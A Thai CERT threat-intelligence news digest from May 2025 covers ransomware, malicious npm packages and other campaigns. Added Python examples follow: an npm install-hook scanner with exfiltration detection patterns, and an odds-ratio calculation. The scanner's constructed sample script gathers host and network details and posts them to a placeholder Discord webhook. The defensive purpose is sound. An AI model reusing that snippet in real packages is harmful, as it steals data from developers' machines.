NCSA Webboard

    Cyber Threat Intelligence 26 May 2025

    Cyber Security News
    Posted by NCSA_THAICERT

      Malware

      • DragonForce Targets Rivals In a Play For Dominance
        "DragonForce is not just another ransomware brand – it’s a destabilizing force trying to reshape the ransomware landscape. Counter Threat Unit (CTU) researchers are actively tracking the evolution of the threat posed by the group. DragonForce is involved in high-impact attacks targeting both traditional IT infrastructure and virtualized environments (e.g., VMware ESXi), with a strong emphasis on credential theft, Active Directory abuse, and data exfiltration. In March 2025, it launched efforts to claim dominance in the ransomware ecosystem by introducing a more flexible affiliate model and targeting other ransomware groups."
        https://news.sophos.com/en-us/2025/05/21/dragonforce-targets-rivals-in-a-play-for-dominance/
        https://www.infosecurity-magazine.com/news/dragonforce-turf-war-ransomware/
      • 60 Malicious Npm Packages Leak Network And Host Data In Active Malware Campaign
        "Socket’s Threat Research Team has uncovered an active campaign in the npm ecosystem that now spans 60 packages published under three npm accounts. Each package carries a small install‑time script that, when triggered during npm install, collects hostnames, internal and external IP addresses, DNS server lists, and user directory paths, then exfiltrates the data to a Discord webhook under the threat actor’s control."
        https://socket.dev/blog/60-malicious-npm-packages-leak-network-and-host-data
        https://www.bleepingcomputer.com/news/security/dozens-of-malicious-packages-on-npm-collect-host-and-network-data/
        https://www.bankinfosecurity.com/reconnaissance-campaign-active-on-npm-repository-a-28475
      • FBI Warns Of Luna Moth Extortion Attacks Targeting Law Firms
        "The FBI warned that an extortion gang known as the Silent Ransom Group has been targeting U.S. law firms over the last two years in callback phishing and social engineering attacks. Also known as Luna Moth, Chatty Spider, and UNC3753, this threat group has been active since 2022 and was also behind BazarCall campaigns that provided initial access to corporate networks for Ryuk and Conti ransomware attacks. In March 2022, following Conti's shutdown, the threat actors separated from the cybercrime syndicate and formed their own operation called Silent Ransom Group (SRG)."
        https://www.bleepingcomputer.com/news/security/fbi-warns-of-luna-moth-extortion-attacks-targeting-law-firms/
        https://www.ic3.gov/CSA/2025/250523.pdf
        https://securityaffairs.com/178239/malware/silent-ransom-group-targeting-law-firms-the-fbi-warns.html
        https://hackread.com/fbi-silent-ransom-group-law-firms-via-scam-calls/
      • ViciousTrap – Infiltrate, Control, Lure: Turning Edge Devices Into Honeypots En Masse.
        "In a previous blogpost, Sekoia’s Threat Detection & Research (TDR) team documented the exploitation of the CVE-2023-20118 vulnerability, which was used to deploy two distinct threats: a webshell and the PolarEdge malware. Through the observation of activity on our honeypots, it was possible to identify a third actor, nicknamed ViciousTrap by Sekoia.io, using the same vulnerability. The infection chain involves the execution of a shell script, dubbed NetGhost, which redirects incoming traffic from specific ports of the compromised router to a honeypot-like infrastructure under the attacker’s control, allowing them to intercept network flows."
        https://blog.sekoia.io/vicioustrap-infiltrate-control-lure-turning-edge-devices-into-honeypots-en-masse/
        https://thehackernews.com/2025/05/vicioustrap-uses-cisco-flaw-to-build.html
      • Joint Analysis By AhnLab And NCSC On TA-ShadowCricket: Emerging Malware Trends And IRC Server Tracking
        "Since November 2024, AhnLab has been working with the NCSC to analyze the malicious IRC server and related malware to classify the unidentified threat actor as Larva-24013 and trace their activities, and has confirmed their association with the Shadow Force group. AhnLab manages malicious activities in four stages through the “Threat Actor Naming and Taxonomy,” classifying threat actors as “Larva” (unidentified threat actors) and “Arthropod” (identified threat actors). Following AhnLab’s threat actor taxonomy and naming convention, the threat actor has been identified and named TA-ShadowCricket."
        https://asec.ahnlab.com/en/88137/
      • Case Of Larva-25004 Group (Related To Kimsuky) Exploiting Additional Certificate – Malware Signed With Nexaweb Certificate
        "AhnLab SEcurity intelligence Center (ASEC) has discovered malware signed with the certificate of Nexaweb Inc. by investigating a file with the same characteristics as the one signed with a Korean company’s certificate. These malware samples have been reported by other security companies about the activities of the Kimsuky group."
        https://asec.ahnlab.com/en/88132/
      • Information Leakage Caused By DB Client Tool
        "In recent breach incidents, threat actors have been observed not only accessing systems, but also directly querying internal databases and stealing sensitive information. Particularly, more threat actors are installing DB client tools directly on targeted systems to exfiltrate data, and legitimate tools such as DBeaver, Navicat, and sqlcmd are being used in this process."
        https://asec.ahnlab.com/en/88134/
      • NSIS Abuse And sRDI Shellcode: Anatomy Of The Winos 4.0 Campaign
        "Rapid7 has been tracking a malware campaign that uses fake software installers disguised as popular apps like VPN and QQBrowser—to deliver Winos v4.0, a hard-to-detect malware that runs entirely in memory and gives attackers remote access. The campaign was first spotted during a February 2025 MDR investigation. Since then, we’ve seen more samples using the same infection method—a multi-layered setup we call the Catena loader. Catena uses embedded shellcode and configuration switching logic to stage payloads like Winos v4.0 entirely in memory, evading traditional antivirus tools."
        https://www.rapid7.com/blog/post/2025/05/22/nsis-abuse-and-srdi-shellcode-anatomy-of-the-winos-4-0-campaign/
        https://thehackernews.com/2025/05/hackers-use-fake-vpn-and-browser-nsis.html
      • Fake Zenmap, WinMTR Sites Target IT Staff With Bumblebee Malware
        "The Bumblebee malware SEO poisoning campaign uncovered earlier this week impersonating RVTools is using more typosquatting domains mimicking other popular open-source projects to infect devices used by IT staff. BleepingComputer was able to find two cases leveraging the notoriety of Zenmap, the GUI for the Nmap network scanning tool, and the WinMTR traceroute utility. Both of these tools are commonly used by IT staff to diagnose or analyze network traffic, requiring administrative privileges for some of the features to work. This makes users of these tools prime targets for threat actors looking to breach corporate networks and spread laterally to other devices."
        https://www.bleepingcomputer.com/news/security/bumblebee-malware-distributed-via-zenmap-winmrt-seo-poisoning/
      • Mysterious Hacking Group Careto Was Run By The Spanish Government, Sources Say
        "More than a decade ago, researchers at antivirus company Kaspersky identified suspicious internet traffic of what they thought was a known government-backed group, based on similar targeting and its phishing techniques. Soon, the researchers realized they had found a much more advanced hacking operation that was targeting the Cuban government, among others. Eventually the researchers were able to attribute the network activity to a mysterious — and at the time completely unknown — Spanish-speaking hacking group that they called Careto, after the Spanish slang word (“ugly face” or “mask” in English), which they found buried within the malware’s code."
        https://techcrunch.com/2025/05/23/mysterious-hacking-group-careto-was-run-by-the-spanish-government-sources-say/

      General News

      • Recalibrating Risk In The Age Of AI
        "Artificial intelligence is transforming the enterprise landscape, with organizations reporting a 17% jump in cyber breaches over the past year and 55% experiencing attacks. Security teams struggle with visibility gaps while adversaries weaponize AI to strike harder and faster, according to the Gigamon 2025 Hybrid Cloud Security Survey. AI is exposing critical security weaknesses faster than most organizations can respond, the survey says. With global AI investment expected to grow beyond $200 billion in 2025 and reach $750 billion by 2028, security leaders must recalibrate how they define, measure and mitigate risk in this new era."
        https://www.bankinfosecurity.com/blogs/recalibrating-risk-in-age-ai-p-3874
        https://www.gigamon.com/campaigns/hybrid-cloud-security-survey.html
      • Token Security Unveils MCP Server For Non-Human Identity Security
        "Token Security launched Model Context Protocol (MCP) Server for non-human identity (NHI). This capability brings the power of agentic AI to modern security operations and enables teams to interact with complex NHI data using simple, natural language. The Token MCP Server leverages the open-standard Model Context Protocol to bridge large language models (LLMs) with enterprise identity data, delivering intelligent insights and guided remediation through a conversational interface."
        https://www.helpnetsecurity.com/2025/05/23/token-security-token-mcp-server/
      • Is Privacy Becoming a Luxury? A Candid Look At Consumer Data Use
        "In this Help Net Security interview, Dr. Joy Wu, Assistant Professor, UBC Sauder School of Business, discusses the psychological and societal impacts of data monetization, why current privacy disclosures often fall short, and what it will take to create a more equitable data ecosystem. From the limits of transparency to the potential for privacy to become a luxury, Wu offers a candid assessment of where we are, and where we’re headed."
        https://www.helpnetsecurity.com/2025/05/23/joy-wu-ubc-sauder-school-of-business-privacy-luxury/
      • Outsourcing Cybersecurity: How SMBs Can Make Smart Moves
        "Outsourcing cybersecurity can be a practical and affordable option. It allows small businesses to get the protection they need without straining their budgets, freeing up time and resources to focus on core operations. 76% of SMBs lack the in-house skills to properly address security issues, increasing demand for the expertise and services of MSPs, and 78% are concerned that a severe cyberattack could drive them out of operation, according to ConnectWise."
        https://www.helpnetsecurity.com/2025/05/23/smbs-outsourcing-cybersecurity/
      • Digital Trust Is Cracking Under The Pressure Of Deepfakes, Cybercrime
        "69% of global respondents to a Jumio survey say AI-powered fraud now poses a greater threat to personal security than traditional forms of identity theft. This number rises to 74% in Singapore, with 71% also indicating that AI-generated scams are harder to detect than traditional scams."
        https://www.helpnetsecurity.com/2025/05/23/ai-powered-fraud-threat/
      • Shift Left Strategy Creates Heavy Burden For Developers
        "While 47% of organizations claim to have implemented shift left security strategies, many still struggle with execution gaps and security inefficiencies, according to Pynt. Of those who haven’t implemented shift left, half of them have no plans to do so at all. Since shift left security was introduced, companies have been trying to live up to its promise: identifying and addressing security issues earlier in the software development lifecycle, ideally before code ever reaches production."
        https://www.helpnetsecurity.com/2025/05/23/shift-left-security-strategies/
      • Scarcity Signals: Are Rare Activities Red Flags?
        "Cisco Talos reviewed six months of network connection telemetry logs spanning June 1, 2024 – Dec. 31, 2024, containing 3,220,829 log events and 742 unique base domains, to explore if domains that PowerShell rarely contacts are more likely to be malicious. Key findings reveal that the odds of a rare domain being malicious were 3.18 times higher than for frequently contacted domains (95% CI: 0.39–25.9), suggesting a trend towards higher risk in rare domains."
        https://blog.talosintelligence.com/scarcity-signals-are-rare-activities-red-flags/
      • 3 Critical Pillars Of Cyber-Resilience
        "A single ransomware attack can wreak havoc in the blink of an eye. The Change Healthcare incident, for example, left millions of patients without prescription access, delaying life-saving treatments. With over 100 million patient records leaked, the long tail of ransomware damage is apparent. In fact, a deeper analysis of the attack found that nearly 23% of healthcare businesses with more than $100 million in revenue experienced downstream impacts, as did 11% of those with revenues of $25 million to $100 million."
        https://www.darkreading.com/cyber-risk/three-critical-pillars-of-cyber-resilience
      • Rethinking Data Privacy In The Age Of Generative AI
        "The rise of generative artificial intelligence (GenAI) has reshaped the conversation around data privacy, sparking concerns about how personal and organizational data is used, stored, and protected. Large language models (LLMs) are trained on vast datasets scraped from the Internet. This has triggered an urgent debate about whether individuals and businesses are aware of how their data is being used. As a result, many are questioning if existing copyright and privacy laws should be updated to reflect this new era."
        https://www.darkreading.com/cyber-risk/rethinking-data-privacy-age-generative-ai
      • Operation ENDGAME Strikes Again: The Ransomware Kill Chain Broken At Its Source
        "Cybercriminals around the world have suffered a major disruption after law enforcement and judicial authorities, coordinated by Europol and Eurojust, dismantled key infrastructure behind the malware used to launch ransomware attacks. From 19 to 22 May, authorities took down some 300 servers worldwide, neutralised 650 domains, and issued international arrest warrants against 20 targets, dealing a direct blow to the ransomware kill chain."
        https://www.europol.europa.eu/media-press/newsroom/news/operation-endgame-strikes-again-ransomware-kill-chain-broken-its-source
        https://thehackernews.com/2025/05/300-servers-and-35m-seized-as-europol.html
        https://therecord.media/hackers-charged-infrastructure-dismantled-operation-endgame
        https://cyberscoop.com/operation-endgame-ransomware-infrastructure-takedown-europol/
        https://www.infosecurity-magazine.com/news/law-enforcement-initial-access/
        https://www.helpnetsecurity.com/2025/05/23/operation-endgame-danabot-botnet-disrupted-qakbot-leader-indicted/
        https://www.bankinfosecurity.com/initial-access-brokers-targeted-in-operation-endgame-20-a-28476
        https://securityaffairs.com/178245/cyber-crime/operation-endgame-disrupted-global-ransomware-infrastructure.html
      • Cybercrime Is 'Orders Of Magnitude' Larger Than State-Backed Ops, Says Ex-White House Advisor
        "Uncle Sam's cybersecurity apparatus can't only focus on China and other nation-state actors, but also has to fight the much bigger damage from plain old cybercrime, says former White House advisor Michael Daniel. And the Trump administration's steep cuts to federal government staff are making that a lot harder. Daniel currently leads the Cyber Threat Alliance, a nonprofit threat-intel-sharing organization. Before he took that role, he served as special assistant to President Obama and cybersecurity coordinator on the National Security Council staff between 2012 and 2017."
        https://www.theregister.com/2025/05/24/cyber_crime_bigger_than_nation_state/

      Reference
      Electronic Transactions Development Agency (ETDA)
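The install-hook reconnaissance pattern in the Socket item above (host name, network interfaces, DNS servers and home directory collected during `npm install` and posted to a Discord webhook) can be checked for locally before a dependency is trusted. The block below is an added example written for this digest, not code from Socket, npm or any of the cited sources: it parses a package's package.json, picks out the lifecycle hooks npm runs automatically, and scans the script each hook references for recon APIs and exfiltration sinks. The sample package.json and setup.js contents, the indicator regexes and the severity rule are constructed assumptions for illustration, not indicators taken from the report.

```python
"""Audit an npm package for install-time scripts that fingerprint the host and
phone home. Added example for this digest; not code from Socket, npm or NCSA.
The sample package, the indicator regexes and the severity rule are assumptions."""
import json
import re
from dataclasses import dataclass, field

# Lifecycle hooks that npm executes automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Node APIs that gather host/network facts. Indicator list is an assumption.
RECON_APIS = {
    "hostname": re.compile(r"\bos\.hostname\s*\("),
    "interfaces": re.compile(r"\bos\.networkInterfaces\s*\("),
    "dns_servers": re.compile(r"\bdns\.getServers\s*\("),
    "home_dir": re.compile(r"\bos\.(homedir|userInfo)\s*\("),
    "external_ip": re.compile(r"https?://(api\.ipify\.org|ifconfig\.me|icanhazip\.com)"),
}
# Places the gathered data could be sent. Indicator list is an assumption.
EXFIL_SINKS = {
    "discord_webhook": re.compile(r"https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/"),
    "http_post": re.compile(r"\b(?:fetch|axios\.post|https?\.request)\s*\("),
}


@dataclass
class Finding:
    package: str
    hook: str
    command: str
    recon: list = field(default_factory=list)
    sinks: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        # Recon plus a sink in one install hook is the reported pattern.
        if self.recon and self.sinks:
            return "high"
        if self.recon or self.sinks:
            return "medium"
        return "low"


def audit_package(package_json: str, files: dict) -> list:
    """One Finding per install hook. `files` maps file names inside the package
    to their source text, so a hook such as `node setup.js` is scanned by content."""
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        body = cmd  # inline `node -e "..."` payloads are scanned via the command itself
        for name, src in files.items():
            if name in cmd:
                body += "\n" + src
        f = Finding(pkg.get("name", "?"), hook, cmd)
        f.recon = [k for k, rx in RECON_APIS.items() if rx.search(body)]
        f.sinks = [k for k, rx in EXFIL_SINKS.items() if rx.search(body)]
        findings.append(f)
    return findings


# Constructed sample resembling the described hook; not a real package.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-recon-pkg",  # hypothetical name
    "version": "1.0.0",
    "scripts": {"postinstall": "node setup.js"},
})
SAMPLE_FILES = {
    "setup.js": """
const os = require('os'); const dns = require('dns'); const https = require('https');
const data = { host: os.hostname(), ifaces: os.networkInterfaces(),
               dns: dns.getServers(), home: os.homedir() };
const req = https.request('https://discord.com/api/webhooks/0000/AAAA', {method: 'POST'});
req.end(JSON.stringify(data));
""",
}
# Constructed benign package: a native build step, no recon, no sink.
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "example-native-pkg", "version": "2.0.0",
    "scripts": {"install": "node-gyp rebuild", "test": "jest"},
})

if __name__ == "__main__":
    for f in audit_package(SAMPLE_PACKAGE_JSON, SAMPLE_FILES) + audit_package(BENIGN_PACKAGE_JSON, {}):
        print(f"{f.severity:6} {f.package} {f.hook}: {f.command} recon={f.recon} sinks={f.sinks}")
```

To run it over a real tree, feed each `node_modules/<pkg>/package.json` and the files its install hooks reference. Independently of any scanner, `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) stops these hooks from running at all, at the cost of breaking packages that genuinely need a build step.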

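The Talos "scarcity signals" item above reports an odds ratio of 3.18 with a 95% confidence interval of 0.39–25.9. The interval spanning 1 is the practical caveat: the point estimate alone overstates the evidence that rare domains are malicious. The block below is an added example for this digest, not Talos code, that reproduces the computation on a constructed PowerShell connection log: count connections per base domain, split domains into rare and frequent by a threshold, build the 2x2 table and compute the odds ratio with a Wald 95% CI. The log lines, the malicious labels and the rarity threshold are assumptions.

```python
"""Odds ratio of 'malicious' for rarely vs frequently contacted domains, the
statistic behind the Talos scarcity-signal result. Added example, not Talos code.
The event log, the labels and RARE_THRESHOLD are constructed assumptions."""
import math
from collections import Counter

# Constructed PowerShell connection telemetry: (base_domain, is_malicious),
# one tuple per connection event. Labels are assumptions for illustration.
EVENTS = (
    [("update.microsoft.com", False)] * 40
    + [("login.windows.net", False)] * 35
    + [("chocolatey.org", False)] * 12
    + [("cdn.example-vendor.net", False)] * 9
    + [("a1b2c3.example-bad.top", True)] * 2
    + [("paste.example-drop.io", True)] * 1
    + [("cheap-hosting-example.xyz", False)] * 2
    + [("legit-niche-tool.example", False)] * 1
)
RARE_THRESHOLD = 3  # a domain seen this many times or fewer is "rare" (assumption)


def domain_table(events, threshold=RARE_THRESHOLD):
    """2x2 table keyed by (is_rare, is_malicious) -> number of unique domains."""
    freq = Counter(d for d, _ in events)
    label = {}
    for d, bad in events:
        label[d] = label.get(d, False) or bad  # any malicious event taints the domain
    table = Counter()
    for d, n in freq.items():
        table[(n <= threshold, label[d])] += 1
    return table


def odds_ratio(table, z=1.96):
    """Odds ratio (rare vs frequent) with a Wald 95% CI on the log scale.
    Haldane correction (+0.5 per cell) keeps zero cells from blowing up."""
    a = table[(True, True)] + 0.5    # rare & malicious
    b = table[(True, False)] + 0.5   # rare & benign
    c = table[(False, True)] + 0.5   # frequent & malicious
    d = table[(False, False)] + 0.5  # frequent & benign
    or_ = (a * d) / (b * c)
    se = math.sqrt(1 / a + 1 / b + 1 / c + 1 / d)
    lo = math.exp(math.log(or_) - z * se)
    hi = math.exp(math.log(or_) + z * se)
    return or_, lo, hi


def assess(events=EVENTS):
    """Summarise the signal; 'significant' requires the whole CI to lie above 1."""
    or_, lo, hi = odds_ratio(domain_table(events))
    return {
        "odds_ratio": round(or_, 2),
        "ci95": (round(lo, 2), round(hi, 2)),
        "significant": lo > 1.0,
    }


if __name__ == "__main__":
    t = domain_table(EVENTS)
    print("rare/mal", t[(True, True)], "rare/benign", t[(True, False)],
          "freq/mal", t[(False, True)], "freq/benign", t[(False, False)])
    print(assess())
```

On this constructed log the point estimate is large (rare domains look nine times as likely to be malicious) but the interval runs from well below 1 to the hundreds, which is the same shape as the Talos figures: a lead worth triaging, not a detection on its own. Widen the window or add more labelled domains before treating rarity as more than a prioritisation hint.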